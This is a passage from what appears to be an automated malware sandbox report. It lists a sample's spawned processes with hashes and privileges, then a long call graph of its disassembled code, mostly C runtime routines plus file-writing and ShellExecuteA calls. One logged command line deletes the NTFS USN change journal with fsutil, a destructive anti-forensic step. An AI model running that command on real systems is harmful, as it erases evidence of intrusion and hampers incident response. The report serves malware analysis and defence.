                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              General

                                              Target ID:13
                                              Start time:19:12:09
                                              Start date:22/11/2023
                                              Path:C:\Windows\SysWOW64\fsutil.exe
                                              Wow64 process (32bit):true
                                              Commandline:fsutil usn deletejournal /D C:
                                              Imagebase:0xb10000
                                              File size:167'440 bytes
                                              MD5 hash:452CA7574A1B2550CD9FF83DDBE87463
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Has exited:true

                                              Disassembly

                                              Reset < >

                                                Execution Graph

                                                Execution Coverage:9.8%
                                                Dynamic/Decrypted Code Coverage:0%
                                                Signature Coverage:4.2%
                                                Total number of Nodes:952
                                                Total number of Limit Nodes:24
                                                execution_graph 3532 31261 3533 31270 3532->3533 3534 31276 3532->3534 3535 31684 __amsg_exit 62 API calls 3533->3535 3536 3127b __mtinitlocknum 3534->3536 3538 316a9 3534->3538 3535->3534 3539 3152e _doexit 62 API calls 3538->3539 3540 316b4 3539->3540 3540->3536 3541 325e0 3542 32619 3541->3542 3543 3260c 3541->3543 3545 310e6 __call_reportfault 5 API calls 3542->3545 3544 310e6 __call_reportfault 5 API calls 3543->3544 3544->3542 3551 32629 __except_handler4 __IsNonwritableInCurrentImage 3545->3551 3546 326ac 3547 32682 __except_handler4 3547->3546 3548 3269c 3547->3548 3549 310e6 __call_reportfault 5 API calls 3547->3549 3550 310e6 __call_reportfault 5 API calls 3548->3550 3549->3548 3550->3546 3551->3546 3551->3547 3557 342a2 RtlUnwind 3551->3557 3553 326fe __except_handler4 3554 32732 3553->3554 3555 310e6 __call_reportfault 5 API calls 3553->3555 3556 310e6 __call_reportfault 5 API calls 3554->3556 3555->3554 3556->3547 3557->3553 3464 3128b 3467 3276f 3464->3467 3466 31290 3466->3466 3468 327a1 GetSystemTimeAsFileTime GetCurrentProcessId GetCurrentThreadId GetTickCount QueryPerformanceCounter 3467->3468 3469 32794 3467->3469 3470 32798 3468->3470 3469->3468 3469->3470 3470->3466 3471 3538a IsProcessorFeaturePresent 3472 32f08 3473 33daa __calloc_crt 62 API calls 3472->3473 3474 32f14 EncodePointer 3473->3474 3475 32f2d 3474->3475 3476 3124d 3479 318e4 3476->3479 3480 3221d __getptd_noexit 62 API calls 3479->3480 3481 3125e 3480->3481 3482 3474d 3483 316b8 __amsg_exit 62 API calls 3482->3483 3484 34754 3483->3484 3485 34210 3486 34222 3485->3486 3488 34230 @_EH4_CallFilterFunc@8 3485->3488 3487 310e6 __call_reportfault 5 API calls 3486->3487 3487->3488 3489 35150 RtlUnwind 3562 322b0 3564 322bc __mtinitlocknum 3562->3564 3563 322d4 3565 322e2 3563->3565 3568 33ccc _free 62 API calls 3563->3568 3564->3563 3566 323be __mtinitlocknum 3564->3566 3567 33ccc _free 62 API calls 3564->3567 3569 322f0 3565->3569 3570 33ccc _free 62 API calls 3565->3570 3567->3563 3568->3565 3571 322fe 3569->3571 3572 33ccc _free 62 API calls 3569->3572 3570->3569 3573 3230c 3571->3573 3575 33ccc _free 62 API calls 3571->3575 3572->3571 3574 3231a 3573->3574 3576 33ccc _free 62 API calls 3573->3576 3577 32328 3574->3577 3578 33ccc _free 62 API calls 3574->3578 3575->3573 3576->3574 3579 32339 3577->3579 3580 33ccc _free 62 API calls 3577->3580 3578->3577 3581 329d6 __lock 62 API calls 3579->3581 3580->3579 3582 32341 3581->3582 3583 32366 3582->3583 3584 3234d InterlockedDecrement 3582->3584 3598 323ca 3583->3598 3584->3583 3586 32358 3584->3586 3586->3583 3588 33ccc _free 62 API calls 3586->3588 3588->3583 3589 329d6 __lock 62 API calls 3590 3237a 3589->3590 3591 323ab 3590->3591 3593 33ed3 ___removelocaleref 8 API calls 3590->3593 3601 323d6 3591->3601 3596 3238f 3593->3596 3595 33ccc _free 62 API calls 3595->3566 3596->3591 3597 33f6c ___freetlocinfo 62 API calls 3596->3597 3597->3591 3604 328fd LeaveCriticalSection 3598->3604 3600 32373 3600->3589 3605 328fd LeaveCriticalSection 3601->3605 3603 323b8 3603->3595 3604->3600 3605->3603 3490 3139b 3491 313d7 3490->3491 3492 313ad 3490->3492 3492->3491 3494 32812 3492->3494 3495 3281e __mtinitlocknum 3494->3495 3496 32296 __getptd 62 API calls 3495->3496 3498 32823 3496->3498 3500 342d2 3498->3500 3499 32845 __mtinitlocknum 3499->3491 3501 342d7 _abort 3500->3501 3502 342e2 3501->3502 3508 32a6b 3501->3508 3504 342fa 3502->3504 3505 32c3b __call_reportfault 8 API calls 3502->3505 3506 31684 __amsg_exit 62 API calls 3504->3506 3505->3504 3507 34304 3506->3507 3507->3499 3510 32a77 __mtinitlocknum 3508->3510 3509 32ad2 3513 32ae1 3509->3513 3515 32aa3 _siglookup 3509->3515 3510->3509 3511 32a9e 3510->3511 3510->3513 3510->3515 3512 3221d __getptd_noexit 62 API calls 3511->3512 3512->3515 3514 32e3f _malloc 62 API calls 3513->3514 3516 32ae6 3514->3516 3518 32b3e 3515->3518 3519 31684 __amsg_exit 62 API calls 3515->3519 3525 32aac __mtinitlocknum 3515->3525 3517 32db6 _strcpy_s 10 API calls 3516->3517 3517->3525 3520 329d6 __lock 62 API calls 3518->3520 3521 32b49 3518->3521 3519->3518 3520->3521 3523 32b7e 3521->3523 3526 320e6 EncodePointer 3521->3526 3527 32bd2 3523->3527 3525->3502 3526->3523 3528 32bd8 3527->3528 3530 32bdf 3527->3530 3531 328fd LeaveCriticalSection 3528->3531 3530->3525 3531->3530 2485 3111e 2525 32580 2485->2525 2487 3112a GetStartupInfoW 2488 3113e HeapSetInformation 2487->2488 2490 31149 2487->2490 2488->2490 2526 3255a HeapCreate 2490->2526 2491 31197 2492 311a2 2491->2492 2629 310f5 2491->2629 2527 323df GetModuleHandleW 2492->2527 2495 311a8 2496 311b3 __RTC_Initialize 2495->2496 2497 310f5 _fast_error_exit 62 API calls 2495->2497 2552 31e55 GetStartupInfoW 2496->2552 2497->2496 2500 311cd GetCommandLineA 2565 31dbe GetEnvironmentStringsW 2500->2565 2507 311f2 2589 31a8d 2507->2589 2508 316b8 __amsg_exit 62 API calls 2508->2507 2510 311f8 2511 31203 2510->2511 2512 316b8 __amsg_exit 62 API calls 2510->2512 2609 31497 2511->2609 2512->2511 2514 3120b 2515 31216 2514->2515 2516 316b8 __amsg_exit 62 API calls 2514->2516 2615 31a2e 2515->2615 2516->2515 2520 31238 2521 31246 2520->2521 2626 3166e 2520->2626 2644 3169a 2521->2644 2524 3124b __mtinitlocknum 2525->2487 2526->2491 2528 323f3 2527->2528 2529 323fc GetProcAddress GetProcAddress GetProcAddress GetProcAddress 2527->2529 2647 3212c 2528->2647 2531 32446 TlsAlloc 2529->2531 2534 32555 2531->2534 2535 32494 TlsSetValue 2531->2535 2534->2495 2535->2534 2536 324a5 2535->2536 2656 31440 2536->2656 2541 32550 2543 3212c __mtterm 65 API calls 2541->2543 2542 324ed DecodePointer 2544 32502 2542->2544 2543->2534 2544->2541 2665 33daa 2544->2665 2547 32520 DecodePointer 2548 32531 2547->2548 2548->2541 2549 32535 2548->2549 2671 32169 2549->2671 2551 3253d GetCurrentThreadId 2551->2534 2553 33daa __calloc_crt 62 API calls 2552->2553 2554 31e73 2553->2554 2554->2554 2556 33daa __calloc_crt 62 API calls 2554->2556 2558 311c1 2554->2558 2560 31f68 2554->2560 2561 31fe8 2554->2561 2555 3201e GetStdHandle 2555->2561 2556->2554 2557 32082 SetHandleCount 2557->2558 2558->2500 2637 316b8 2558->2637 2559 32030 GetFileType 2559->2561 2560->2561 2562 31f94 GetFileType 2560->2562 2563 31f9f InitializeCriticalSectionAndSpinCount 2560->2563 2561->2555 2561->2557 2561->2559 2564 32056 InitializeCriticalSectionAndSpinCount 2561->2564 2562->2560 2562->2563 2563->2558 2563->2560 2564->2558 2564->2561 2566 311dd 2565->2566 2567 31dda WideCharToMultiByte 2565->2567 2578 31d03 2566->2578 2569 31e47 FreeEnvironmentStringsW 2567->2569 2570 31e0f 2567->2570 2569->2566 2571 33d65 __malloc_crt 62 API calls 2570->2571 2572 31e15 2571->2572 2572->2569 2573 31e1d WideCharToMultiByte 2572->2573 2574 31e3b FreeEnvironmentStringsW 2573->2574 2575 31e2f 2573->2575 2574->2566 2576 33ccc _free 62 API calls 2575->2576 2577 31e37 2576->2577 2577->2574 2579 31d18 2578->2579 2580 31d1d GetModuleFileNameA 2578->2580 2913 33cae 2579->2913 2582 31d44 2580->2582 2907 31b69 2582->2907 2584 311e7 2584->2507 2584->2508 2586 33d65 __malloc_crt 62 API calls 2587 31d86 2586->2587 2587->2584 2588 31b69 _parse_cmdline 72 API calls 2587->2588 2588->2584 2590 31a96 2589->2590 2594 31a9b _strlen 2589->2594 2591 33cae ___initmbctable 90 API calls 2590->2591 2591->2594 2592 31aa9 2592->2510 2593 33daa __calloc_crt 62 API calls 2595 31ad0 _strlen 2593->2595 2594->2592 2594->2593 2595->2592 2596 31b1f 2595->2596 2598 33daa __calloc_crt 62 API calls 2595->2598 2599 31b45 2595->2599 2602 31b5c 2595->2602 3354 33d06 2595->3354 2597 33ccc _free 62 API calls 2596->2597 2597->2592 2598->2595 2600 33ccc _free 62 API calls 2599->2600 2600->2592 2603 32d64 __invoke_watson 10 API calls 2602->2603 2605 31b68 2603->2605 2604 335d0 _parse_cmdline 72 API calls 2604->2605 2605->2604 2607 31bf5 2605->2607 2606 31cf3 2606->2510 2607->2606 2608 335d0 72 API calls _parse_cmdline 2607->2608 2608->2607 2611 314a5 __IsNonwritableInCurrentImage 2609->2611 3363 32f8c 2611->3363 2612 314c3 __initterm_e 2614 314e4 __IsNonwritableInCurrentImage 2612->2614 3366 32f75 2612->3366 2614->2514 2616 31a3c 2615->2616 2618 31a41 2615->2618 2617 33cae ___initmbctable 90 API calls 2616->2617 2617->2618 2619 3121c 2618->2619 2620 335d0 _parse_cmdline 72 API calls 2618->2620 2621 31070 2619->2621 2620->2618 3428 31000 2621->3428 2623 31080 2624 31000 8 API calls 2623->2624 2625 3108c CreateFileA WriteFile FindCloseChangeNotification ShellExecuteA 2624->2625 2625->2520 3431 3152e 2626->3431 2628 3167f 2628->2521 2630 31103 2629->2630 2631 31108 2629->2631 2632 318ab __FF_MSGBANNER 62 API calls 2630->2632 2633 316fc __NMSG_WRITE 62 API calls 2631->2633 2632->2631 2634 31110 2633->2634 2635 31416 _fast_error_exit 3 API calls 2634->2635 2636 3111a 2635->2636 2636->2492 2638 318ab __FF_MSGBANNER 62 API calls 2637->2638 2639 316c2 2638->2639 2640 316fc __NMSG_WRITE 62 API calls 2639->2640 2641 316ca 2640->2641 3461 31684 2641->3461 2645 3152e _doexit 62 API calls 2644->2645 2646 316a5 2645->2646 2646->2524 2650 32136 2647->2650 2648 32156 TlsFree 2649 32164 2648->2649 2651 328c2 DeleteCriticalSection 2649->2651 2652 328da 2649->2652 2650->2648 2650->2649 2684 33ccc 2651->2684 2654 328ec DeleteCriticalSection 2652->2654 2655 323f8 2652->2655 2654->2652 2655->2495 2709 320e6 EncodePointer 2656->2709 2658 31448 __init_pointers __initp_misc_winsig 2710 3284b EncodePointer 2658->2710 2660 3146e EncodePointer EncodePointer EncodePointer EncodePointer 2661 3285c 2660->2661 2662 32867 2661->2662 2663 32871 InitializeCriticalSectionAndSpinCount 2662->2663 2664 324e9 2662->2664 2663->2662 2663->2664 2664->2541 2664->2542 2668 33db3 2665->2668 2667 32518 2667->2541 2667->2547 2668->2667 2669 33dd1 Sleep 2668->2669 2711 34b3e 2668->2711 2670 33de6 2669->2670 2670->2667 2670->2668 2719 32580 2671->2719 2673 32175 GetModuleHandleW 2720 329d6 2673->2720 2675 321b3 InterlockedIncrement 2727 3220b 2675->2727 2678 329d6 __lock 60 API calls 2679 321d4 2678->2679 2730 33e44 InterlockedIncrement 2679->2730 2681 321f2 2742 32214 2681->2742 2683 321ff __mtinitlocknum 2683->2551 2685 33cd7 HeapFree 2684->2685 2686 33d00 _free 2684->2686 2685->2686 2687 33cec 2685->2687 2686->2649 2690 32e3f 2687->2690 2693 3221d GetLastError 2690->2693 2692 32e44 GetLastError 2692->2686 2705 320f8 TlsGetValue 2693->2705 2696 3228a SetLastError 2696->2692 2697 33daa __calloc_crt 59 API calls 2698 32248 2697->2698 2698->2696 2699 32281 2698->2699 2700 32269 2698->2700 2702 33ccc _free 59 API calls 2699->2702 2701 32169 __getptd_noexit 59 API calls 2700->2701 2703 32271 GetCurrentThreadId 2701->2703 2704 32287 2702->2704 2703->2696 2704->2696 2706 32128 2705->2706 2707 3210d TlsSetValue 2705->2707 2706->2696 2706->2697 2707->2706 2709->2658 2710->2660 2712 34b4a 2711->2712 2714 34b65 _malloc 2711->2714 2713 34b56 2712->2713 2712->2714 2715 32e3f _malloc 61 API calls 2713->2715 2716 34b78 RtlAllocateHeap 2714->2716 2718 34b9f 2714->2718 2717 34b5b 2715->2717 2716->2714 2716->2718 2717->2668 2718->2668 2719->2673 2721 329eb 2720->2721 2722 329fe EnterCriticalSection 2720->2722 2745 32914 2721->2745 2722->2675 2724 329f1 2724->2722 2725 316b8 __amsg_exit 61 API calls 2724->2725 2726 329fd 2725->2726 2726->2722 2905 328fd LeaveCriticalSection 2727->2905 2729 321cd 2729->2678 2731 33e62 InterlockedIncrement 2730->2731 2732 33e65 2730->2732 2731->2732 2733 33e72 2732->2733 2734 33e6f InterlockedIncrement 2732->2734 2735 33e7f 2733->2735 2736 33e7c InterlockedIncrement 2733->2736 2734->2733 2737 33e89 InterlockedIncrement 2735->2737 2739 33e8c 2735->2739 2736->2735 2737->2739 2738 33ea5 InterlockedIncrement 2738->2739 2739->2738 2740 33ec0 InterlockedIncrement 2739->2740 2741 33eb5 InterlockedIncrement 2739->2741 2740->2681 2741->2739 2906 328fd LeaveCriticalSection 2742->2906 2744 3221b 2744->2683 2746 32920 __mtinitlocknum 2745->2746 2747 32946 2746->2747 2770 318ab 2746->2770 2755 32956 __mtinitlocknum 2747->2755 2806 33d65 2747->2806 2753 32977 2758 329d6 __lock 61 API calls 2753->2758 2754 32968 2757 32e3f _malloc 61 API calls 2754->2757 2755->2724 2757->2755 2760 3297e 2758->2760 2761 329b1 2760->2761 2762 32986 InitializeCriticalSectionAndSpinCount 2760->2762 2763 33ccc _free 61 API calls 2761->2763 2764 32996 2762->2764 2765 329a2 2762->2765 2763->2765 2766 33ccc _free 61 API calls 2764->2766 2812 329cd 2765->2812 2768 3299c 2766->2768 2769 32e3f _malloc 61 API calls 2768->2769 2769->2765 2815 334b7 2770->2815 2772 318b2 2773 318bf 2772->2773 2775 334b7 __FF_MSGBANNER 62 API calls 2772->2775 2774 316fc __NMSG_WRITE 62 API calls 2773->2774 2778 318e1 2773->2778 2776 318d7 2774->2776 2775->2773 2777 316fc __NMSG_WRITE 62 API calls 2776->2777 2777->2778 2779 316fc 2778->2779 2780 3171d __NMSG_WRITE 2779->2780 2781 31839 2780->2781 2783 334b7 __FF_MSGBANNER 59 API calls 2780->2783 2876 310e6 2781->2876 2785 31737 2783->2785 2784 318a9 2803 31416 2784->2803 2786 31848 GetStdHandle 2785->2786 2787 334b7 __FF_MSGBANNER 59 API calls 2785->2787 2786->2781 2790 31856 _strlen 2786->2790 2788 31748 2787->2788 2788->2786 2789 3175a 2788->2789 2789->2781 2840 33454 2789->2840 2790->2781 2793 3188c WriteFile 2790->2793 2793->2781 2794 31786 GetModuleFileNameW 2795 317a7 2794->2795 2799 317b3 _wcslen 2794->2799 2796 33454 __NMSG_WRITE 59 API calls 2795->2796 2796->2799 2797 32d64 __invoke_watson 10 API calls 2797->2799 2798 332f7 59 API calls __NMSG_WRITE 2798->2799 2799->2797 2799->2798 2801 31829 2799->2801 2849 3336c 2799->2849 2858 3318b 2801->2858 2886 313eb GetModuleHandleW 2803->2886 2809 33d6e 2806->2809 2808 32961 2808->2753 2808->2754 2809->2808 2810 33d85 Sleep 2809->2810 2890 34aaa 2809->2890 2811 33d9a 2810->2811 2811->2808 2811->2809 2904 328fd LeaveCriticalSection 2812->2904 2814 329d4 2814->2755 2816 334c3 2815->2816 2817 32e3f _malloc 62 API calls 2816->2817 2818 334cd 2816->2818 2819 334e6 2817->2819 2818->2772 2822 32db6 2819->2822 2825 32d89 2822->2825 2826 32d9a 2825->2826 2831 32d64 2826->2831 2828 32db5 2829 32d89 _strcpy_s 10 API calls 2828->2829 2830 32dc2 2829->2830 2830->2772 2834 32c3b 2831->2834 2835 32c5a _memset __call_reportfault 2834->2835 2836 32c78 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 2835->2836 2837 32d46 __call_reportfault 2836->2837 2838 310e6 __call_reportfault 5 API calls 2837->2838 2839 32d62 GetCurrentProcess TerminateProcess 2838->2839 2839->2828 2841 33462 2840->2841 2842 33469 2840->2842 2841->2842 2846 3348a 2841->2846 2843 32e3f _malloc 62 API calls 2842->2843 2844 3346e 2843->2844 2845 32db6 _strcpy_s 10 API calls 2844->2845 2847 3177b 2845->2847 2846->2847 2848 32e3f _malloc 62 API calls 2846->2848 2847->2794 2847->2799 2848->2844 2854 3337e 2849->2854 2850 33382 2851 32e3f _malloc 62 API calls 2850->2851 2852 33387 2850->2852 2853 3339e 2851->2853 2852->2799 2855 32db6 _strcpy_s 10 API calls 2853->2855 2854->2850 2854->2852 2856 333c5 2854->2856 2855->2852 2856->2852 2857 32e3f _malloc 62 API calls 2856->2857 2857->2853 2884 320e6 EncodePointer 2858->2884 2860 331b1 2861 331c1 LoadLibraryW 2860->2861 2862 3323e 2860->2862 2863 331d6 GetProcAddress 2861->2863 2868 332d6 2861->2868 2867 33258 DecodePointer DecodePointer 2862->2867 2874 3326b 2862->2874 2866 331ec 7 API calls 2863->2866 2863->2868 2864 332a1 DecodePointer 2865 332ca DecodePointer 2864->2865 2869 332a8 2864->2869 2865->2868 2866->2862 2870 3322e GetProcAddress EncodePointer 2866->2870 2867->2874 2871 310e6 __call_reportfault 5 API calls 2868->2871 2869->2865 2873 332bb DecodePointer 2869->2873 2870->2862 2872 332f5 2871->2872 2872->2781 2873->2865 2875 3328e 2873->2875 2874->2864 2874->2865 2874->2875 2875->2865 2877 310f0 IsDebuggerPresent 2876->2877 2878 310ee 2876->2878 2885 3280a 2877->2885 2878->2784 2881 31362 SetUnhandledExceptionFilter UnhandledExceptionFilter 2882 31387 GetCurrentProcess TerminateProcess 2881->2882 2883 3137f __call_reportfault 2881->2883 2882->2784 2883->2882 2884->2860 2885->2881 2887 31414 ExitProcess 2886->2887 2888 313ff GetProcAddress 2886->2888 2888->2887 2889 3140f 2888->2889 2889->2887 2891 34b27 _malloc 2890->2891 2892 34ab8 _malloc 2890->2892 2893 32e3f _malloc 61 API calls 2891->2893 2895 34ae6 RtlAllocateHeap 2892->2895 2897 34ac3 2892->2897 2899 34b13 2892->2899 2902 34b11 2892->2902 2896 34b1f 2893->2896 2894 318ab __FF_MSGBANNER 61 API calls 2894->2897 2895->2892 2895->2896 2896->2809 2897->2892 2897->2894 2898 316fc __NMSG_WRITE 61 API calls 2897->2898 2901 31416 _fast_error_exit 3 API calls 2897->2901 2898->2897 2900 32e3f _malloc 61 API calls 2899->2900 2900->2902 2901->2897 2903 32e3f _malloc 61 API calls 2902->2903 2903->2896 2904->2814 2905->2729 2906->2744 2909 31b88 2907->2909 2911 31bf5 2909->2911 2917 335d0 2909->2917 2910 31cf3 2910->2584 2910->2586 2911->2910 2912 335d0 72 API calls _parse_cmdline 2911->2912 2912->2911 2914 33cb7 2913->2914 2915 33cbe 2913->2915 3241 33b14 2914->3241 2915->2580 2920 3357d 2917->2920 2923 334f6 2920->2923 2924 33509 2923->2924 2925 33556 2923->2925 2931 32296 2924->2931 2925->2909 2928 33536 2928->2925 2951 3380b 2928->2951 2932 3221d __getptd_noexit 62 API calls 2931->2932 2933 3229e 2932->2933 2934 316b8 __amsg_exit 62 API calls 2933->2934 2935 322ab 2933->2935 2934->2935 2935->2928 2936 34104 2935->2936 2937 34110 __mtinitlocknum 2936->2937 2938 32296 __getptd 62 API calls 2937->2938 2939 34115 2938->2939 2940 34143 2939->2940 2942 34127 2939->2942 2941 329d6 __lock 62 API calls 2940->2941 2943 3414a 2941->2943 2944 32296 __getptd 62 API calls 2942->2944 2967 340b7 2943->2967 2946 3412c 2944->2946 2948 3413a __mtinitlocknum 2946->2948 2950 316b8 __amsg_exit 62 API calls 2946->2950 2948->2928 2950->2948 2952 33817 __mtinitlocknum 2951->2952 2953 32296 __getptd 62 API calls 2952->2953 2954 3381c 2953->2954 2955 329d6 __lock 62 API calls 2954->2955 2964 3382e 2954->2964 2956 3384c 2955->2956 2957 33895 2956->2957 2958 33863 InterlockedDecrement 2956->2958 2959 3387d InterlockedIncrement 2956->2959 3237 338a6 2957->3237 2958->2959 2963 3386e 2958->2963 2959->2957 2960 316b8 __amsg_exit 62 API calls 2962 3383c __mtinitlocknum 2960->2962 2962->2925 2963->2959 2965 33ccc _free 62 API calls 2963->2965 2964->2960 2964->2962 2966 3387c 2965->2966 2966->2959 2968 340c4 2967->2968 2969 340f9 2967->2969 2968->2969 2970 33e44 ___addlocaleref 8 API calls 2968->2970 2975 34171 2969->2975 2971 340da 2970->2971 2971->2969 2978 33ed3 2971->2978 3236 328fd LeaveCriticalSection 2975->3236 2977 34178 2977->2946 2979 33f67 2978->2979 2980 33ee4 InterlockedDecrement 2978->2980 2979->2969 2992 33f6c 2979->2992 2981 33ef9 InterlockedDecrement 2980->2981 2982 33efc 2980->2982 2981->2982 2983 33f06 InterlockedDecrement 2982->2983 2984 33f09 2982->2984 2983->2984 2985 33f13 InterlockedDecrement 2984->2985 2986 33f16 2984->2986 2985->2986 2987 33f20 InterlockedDecrement 2986->2987 2989 33f23 2986->2989 2987->2989 2988 33f3c InterlockedDecrement 2988->2989 2989->2988 2990 33f4c InterlockedDecrement 2989->2990 2991 33f57 InterlockedDecrement 2989->2991 2990->2989 2991->2979 2993 33ff0 2992->2993 2996 33f83 2992->2996 2994 33ccc _free 62 API calls 2993->2994 2995 3403d 2993->2995 2997 34011 2994->2997 3007 34066 2995->3007 3062 34c6d 2995->3062 2996->2993 3001 33fb7 2996->3001 3004 33ccc _free 62 API calls 2996->3004 3000 33ccc _free 62 API calls 2997->3000 3006 34024 3000->3006 3002 33fd8 3001->3002 3013 33ccc _free 62 API calls 3001->3013 3008 33ccc _free 62 API calls 3002->3008 3003 33ccc _free 62 API calls 3003->3007 3009 33fac 3004->3009 3005 340ab 3010 33ccc _free 62 API calls 3005->3010 3011 33ccc _free 62 API calls 3006->3011 3007->3005 3012 33ccc 62 API calls _free 3007->3012 3014 33fe5 3008->3014 3022 3504d 3009->3022 3016 340b1 3010->3016 3017 34032 3011->3017 3012->3007 3018 33fcd 3013->3018 3019 33ccc _free 62 API calls 3014->3019 3016->2969 3020 33ccc _free 62 API calls 3017->3020 3050 34fe4 3018->3050 3019->2993 3020->2995 3023 3505e 3022->3023 3049 35147 3022->3049 3024 3506f 3023->3024 3025 33ccc _free 62 API calls 3023->3025 3026 35081 3024->3026 3027 33ccc _free 62 API calls 3024->3027 3025->3024 3028 35093 3026->3028 3030 33ccc _free 62 API calls 3026->3030 3027->3026 3029 350a5 3028->3029 3031 33ccc _free 62 API calls 3028->3031 3032 350b7 3029->3032 3033 33ccc _free 62 API calls 3029->3033 3030->3028 3031->3029 3034 350c9 3032->3034 3035 33ccc _free 62 API calls 3032->3035 3033->3032 3036 33ccc _free 62 API calls 3034->3036 3040 350db 3034->3040 3035->3034 3036->3040 3037 33ccc _free 62 API calls 3039 350ed 3037->3039 3038 350ff 3042 35111 3038->3042 3043 33ccc _free 62 API calls 3038->3043 3039->3038 3041 33ccc _free 62 API calls 3039->3041 3040->3037 3040->3039 3041->3038 3044 35123 3042->3044 3046 33ccc _free 62 API calls 3042->3046 3043->3042 3045 35135 3044->3045 3047 33ccc _free 62 API calls 3044->3047 3048 33ccc _free 62 API calls 3045->3048 3045->3049 3046->3044 3047->3045 3048->3049 3049->3001 3051 34ff1 3050->3051 3061 35049 3050->3061 3052 35001 3051->3052 3054 33ccc _free 62 API calls 3051->3054 3053 35013 3052->3053 3055 33ccc _free 62 API calls 3052->3055 3056 33ccc _free 62 API calls 3053->3056 3057 35025 3053->3057 3054->3052 3055->3053 3056->3057 3058 35037 3057->3058 3059 33ccc _free 62 API calls 3057->3059 3060 33ccc _free 62 API calls 3058->3060 3058->3061 3059->3058 3060->3061 3061->3002 3063 3405b 3062->3063 3064 34c7e 3062->3064 3063->3003 3065 33ccc _free 62 API calls 3064->3065 3066 34c86 3065->3066 3067 33ccc _free 62 API calls 3066->3067 3068 34c8e 3067->3068 3069 33ccc _free 62 API calls 3068->3069 3070 34c96 3069->3070 3071 33ccc _free 62 API calls 3070->3071 3072 34c9e 3071->3072 3073 33ccc _free 62 API calls 3072->3073 3074 34ca6 3073->3074 3075 33ccc _free 62 API calls 3074->3075 3076 34cae 3075->3076 3077 33ccc _free 62 API calls 3076->3077 3078 34cb5 3077->3078 3079 33ccc _free 62 API calls 3078->3079 3080 34cbd 3079->3080 3081 33ccc _free 62 API calls 3080->3081 3082 34cc5 3081->3082 3083 33ccc _free 62 API calls 3082->3083 3084 34ccd 3083->3084 3085 33ccc _free 62 API calls 3084->3085 3086 34cd5 3085->3086 3087 33ccc _free 62 API calls 3086->3087 3088 34cdd 3087->3088 3089 33ccc _free 62 API calls 3088->3089 3090 34ce5 3089->3090 3091 33ccc _free 62 API calls 3090->3091 3092 34ced 3091->3092 3093 33ccc _free 62 API calls 3092->3093 3094 34cf5 3093->3094 3095 33ccc _free 62 API calls 3094->3095 3096 34cfd 3095->3096 3097 33ccc _free 62 API calls 3096->3097 3098 34d08 3097->3098 3099 33ccc _free 62 API calls 3098->3099 3100 34d10 3099->3100 3101 33ccc _free 62 API calls 3100->3101 3102 34d18 3101->3102 3103 33ccc _free 62 API calls 3102->3103 3104 34d20 3103->3104 3105 33ccc _free 62 API calls 3104->3105 3106 34d28 3105->3106 3107 33ccc _free 62 API calls 3106->3107 3108 34d30 3107->3108 3109 33ccc _free 62 API calls 3108->3109 3110 34d38 3109->3110 3111 33ccc _free 62 API calls 3110->3111 3112 34d40 3111->3112 3113 33ccc _free 62 API calls 3112->3113 3114 34d48 3113->3114 3115 33ccc _free 62 API calls 3114->3115 3116 34d50 3115->3116 3117 33ccc _free 62 API calls 3116->3117 3118 34d58 3117->3118 3119 33ccc _free 62 API calls 3118->3119 3120 34d60 3119->3120 3121 33ccc _free 62 API calls 3120->3121 3122 34d68 3121->3122 3123 33ccc _free 62 API calls 3122->3123 3124 34d70 3123->3124 3125 33ccc _free 62 API calls 3124->3125 3126 34d78 3125->3126 3127 33ccc _free 62 API calls 3126->3127 3128 34d80 3127->3128 3129 33ccc _free 62 API calls 3128->3129 3130 34d8e 3129->3130 3131 33ccc _free 62 API calls 3130->3131 3132 34d99 3131->3132 3133 33ccc _free 62 API calls 3132->3133 3134 34da4 3133->3134 3135 33ccc _free 62 API calls 3134->3135 3136 34daf 3135->3136 3137 33ccc _free 62 API calls 3136->3137 3138 34dba 3137->3138 3139 33ccc _free 62 API calls 3138->3139 3140 34dc5 3139->3140 3141 33ccc _free 62 API calls 3140->3141 3142 34dd0 3141->3142 3143 33ccc _free 62 API calls 3142->3143 3144 34ddb 3143->3144 3145 33ccc _free 62 API calls 3144->3145 3146 34de6 3145->3146 3147 33ccc _free 62 API calls 3146->3147 3148 34df1 3147->3148 3149 33ccc _free 62 API calls 3148->3149 3150 34dfc 3149->3150 3151 33ccc _free 62 API calls 3150->3151 3152 34e07 3151->3152 3153 33ccc _free 62 API calls 3152->3153 3154 34e12 3153->3154 3155 33ccc _free 62 API calls 3154->3155 3156 34e1d 3155->3156 3157 33ccc _free 62 API calls 3156->3157 3158 34e28 3157->3158 3159 33ccc _free 62 API calls 3158->3159 3160 34e33 3159->3160 3161 33ccc _free 62 API calls 3160->3161 3162 34e41 3161->3162 3163 33ccc _free 62 API calls 3162->3163 3164 34e4c 3163->3164 3165 33ccc _free 62 API calls 3164->3165 3166 34e57 3165->3166 3167 33ccc _free 62 API calls 3166->3167 3168 34e62 3167->3168 3169 33ccc _free 62 API calls 3168->3169 3170 34e6d 3169->3170 3171 33ccc _free 62 API calls 3170->3171 3172 34e78 3171->3172 3173 33ccc _free 62 API calls 3172->3173 3174 34e83 3173->3174 3175 33ccc _free 62 API calls 3174->3175 3176 34e8e 3175->3176 3177 33ccc _free 62 API calls 3176->3177 3178 34e99 3177->3178 3179 33ccc _free 62 API calls 3178->3179 3180 34ea4 3179->3180 3181 33ccc _free 62 API calls 3180->3181 3182 34eaf 3181->3182 3183 33ccc _free 62 API calls 3182->3183 3184 34eba 3183->3184 3185 33ccc _free 62 API calls 3184->3185 3186 34ec5 3185->3186 3187 33ccc _free 62 API calls 3186->3187 3188 34ed0 3187->3188 3189 33ccc _free 62 API calls 3188->3189 3190 34edb 3189->3190 3191 33ccc _free 62 API calls 3190->3191 3192 34ee6 3191->3192 3193 33ccc _free 62 API calls 3192->3193 3194 34ef4 3193->3194 3195 33ccc _free 62 API calls 3194->3195 3196 34eff 3195->3196 3197 33ccc _free 62 API calls 3196->3197 3198 34f0a 3197->3198 3199 33ccc _free 62 API calls 3198->3199 3200 34f15 3199->3200 3201 33ccc _free 62 API calls 3200->3201 3202 34f20 3201->3202 3203 33ccc _free 62 API calls 3202->3203 3204 34f2b 3203->3204 3205 33ccc _free 62 API calls 3204->3205 3206 34f36 3205->3206 3207 33ccc _free 62 API calls 3206->3207 3208 34f41 3207->3208 3209 33ccc _free 62 API calls 3208->3209 3210 34f4c 3209->3210 3211 33ccc _free 62 API calls 3210->3211 3212 34f57 3211->3212 3213 